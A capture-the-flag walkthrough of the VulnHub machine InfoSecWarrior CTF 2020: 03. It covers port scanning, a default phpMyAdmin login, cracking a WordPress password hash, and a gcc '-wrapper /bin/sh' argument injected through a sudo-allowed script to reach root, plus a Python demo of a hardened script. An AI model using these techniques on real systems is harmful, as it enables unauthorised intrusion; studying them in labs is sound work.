[VLN] InfoSecWarrior CTF 2020: 03

Today we are going to hack the VulnHub machine called InfoSecWarrior CTF 2020: 03. You can download it from the following link: Infosec Warrior CTF 2020

Enumeration


We start with an nmap scan of all TCP ports to see which ones are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.73
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 15:02 CEST
Nmap scan report for ck05.home (192.168.1.73)
Host is up (0.00037s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds

Ports 22 (OpenSSH 7.6p1) and 80 (Apache 2.4.29 serving WordPress 5.3.2) are open. Let's explore port 80 a bit further.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.73 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.73
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/30 15:07:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/phpMyAdmin (Status: 301)
/server-status (Status: 403)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
===============================================================
2020/03/30 15:07:38 Finished
===============================================================
From the output, what stands out is /phpMyAdmin. We open http://192.168.1.73/phpMyAdmin and try default credentials such as admin/admin and admin/password; the pair that works is root/root.

Logged into phpMyAdmin as root, we go to the wpdb database and open its wp_users table, where we find the following: krishna $P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1. The $P$ prefix identifies a phpass portable hash, the format WordPress stores in the user_pass column. With write access to wp_users we could simply overwrite that hash, but recovering the real password is more useful, since it may be reused elsewhere (as it turns out to be here). We fire up John the Ripper to crack it.

sml@Cassandra:~$ echo '$P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1' > crack.txt
sml@Cassandra:~$ john --wordlist=rockyou.txt crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
infosec          (?)
1g 0:00:11:47 DONE (2020-03-30 15:27) 0.001414g/s 10367p/s 10367c/s 10367C/s info~1992..infosec
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
There we have it: krishna/infosec. We try these credentials over SSH.

Low Shell



sml@Cassandra:~$ ssh krishna@192.168.1.73
krishna@192.168.1.73's password: 
krishna@ck05:~$ id
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ ls
msg.txt
krishna@ck05:~$ cat msg.txt 
I configured wordpress for you and make you admin of it. Your login credentials are same as your system login credentials.
krishna@ck05:~$
We check whether krishna can run anything with sudo.

krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$
Let's see what the script we are allowed to run as loopspell does.

krishna@ck05:/home/loopspell$ cat code_compiler.sh 
#!/bin/sh
source_code="${1}"
echo "Code is being compiling ..."
/usr/bin/gcc $source_code -o $(mktemp)
echo "You can find your compiled code in /tmp/ directory."
The script expects a file name as its first argument and compiles it with gcc, writing the binary to a path returned by mktemp. Two things make this exploitable. First, $source_code is expanded unquoted, so the shell field-splits a single argument containing spaces into several separate gcc arguments. Second, gcc's -wrapper option runs an arbitrary program around every compiler subprocess (cc1, as, ld). Passing -wrapper /bin/sh,-s . (the gcc entry on GTFOBins) therefore makes gcc launch /bin/sh -s, which reads its commands from our terminal and gives us a shell as the user running gcc. Knowing this...

krishna@ck05:/home/loopspell$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ."
Code is being compiling ...
$ id
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
We now have a shell as loopspell. We check whether this user can run anything with sudo.

$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell may run /usr/bin/gcc directly as any user, but that entry has no NOPASSWD tag, so it would ask for loopspell's password, which we do not have. The script entry is NOPASSWD and allows any target user, so we repeat exactly the same trick, this time as root.
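
Before repeating the trick as root, it is worth seeing concretely why code_compiler.sh is exploitable and what a safe version looks like. The following is an added example, not code from the machine or the original write-up: it runs a reduced copy of the vulnerable script and a hardened variant through /bin/sh, with a stand-in gcc on PATH that only records the arguments it received, so the field-splitting is visible without a compiler. It assumes a POSIX sh and mktemp are available; the hardened variant assumes the script's intended job is compiling a single .c file.

```python
"""Show why unquoted $source_code in code_compiler.sh lets one argument become
several gcc options, beside a hardened variant. Added example; the real script
calls /usr/bin/gcc, here a stand-in records argv instead."""
import os
import stat
import subprocess
import tempfile

# The line that matters from the machine's script: unquoted expansion.
VULNERABLE = """#!/bin/sh
source_code="${1}"
gcc $source_code -o $(mktemp)
"""

# Hardened variant (assumption: one existing .c file is the only valid input):
# quote the expansion, whitelist the name, and prefix relative paths with ./
# so a file name can never be parsed by gcc as an option.
HARDENED = """#!/bin/sh
source_code="${1}"
case "$source_code" in
    /*.c) ;;
    *.c)  source_code="./$source_code" ;;
    *)    echo "expected a .c source file" >&2; exit 1 ;;
esac
[ -f "$source_code" ] || { echo "no such file: $source_code" >&2; exit 1; }
gcc "$source_code" -o "$(mktemp)"
"""

# Stand-in for /usr/bin/gcc: one argv entry per line, exit 0.
FAKE_GCC = """#!/bin/sh
for a in "$@"; do printf '%s\\n' "$a"; done
"""

PAYLOAD = "-wrapper /bin/sh,-s ."    # the single argument used in the write-up


def run_compiler(script: str, argument: str, make_source: bool = False):
    """Run `script` via sh with one argument; return (exit status, argv seen by gcc)."""
    with tempfile.TemporaryDirectory() as work:
        bindir = os.path.join(work, "bin")
        os.mkdir(bindir)
        gcc = os.path.join(bindir, "gcc")
        with open(gcc, "w") as f:
            f.write(FAKE_GCC)
        os.chmod(gcc, os.stat(gcc).st_mode | stat.S_IXUSR)
        script_path = os.path.join(work, "code_compiler.sh")
        with open(script_path, "w") as f:
            f.write(script)
        if make_source:                  # a real source file for the happy path
            with open(os.path.join(work, argument), "w") as f:
                f.write("int main(void) { return 0; }\n")
        env = dict(os.environ,
                   PATH=bindir + os.pathsep + os.environ.get("PATH", ""),
                   TMPDIR=work)          # keep mktemp output in the scratch dir
        proc = subprocess.run(["sh", script_path, argument], cwd=work, env=env,
                              capture_output=True, text=True)
        return proc.returncode, proc.stdout.splitlines()


if __name__ == "__main__":
    # Vulnerable: gcc receives -wrapper, /bin/sh,-s and . as three arguments.
    print(run_compiler(VULNERABLE, PAYLOAD))
    # Hardened: the payload is rejected before gcc runs.
    print(run_compiler(HARDENED, PAYLOAD))
    # Hardened, legitimate use: gcc receives ./hello.c as a single argument.
    print(run_compiler(HARDENED, "hello.c", make_source=True))
```

The fix is the quoting plus the whitelist, not one or the other: quoting alone still lets a file literally named -wrapper reach gcc as an option, and a whitelist alone leaves the field-splitting in place.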

Privilege Escalation



$ sudo -u root /home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ."
Code is being compiling ...
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 

End


And with that we are root on the machine :)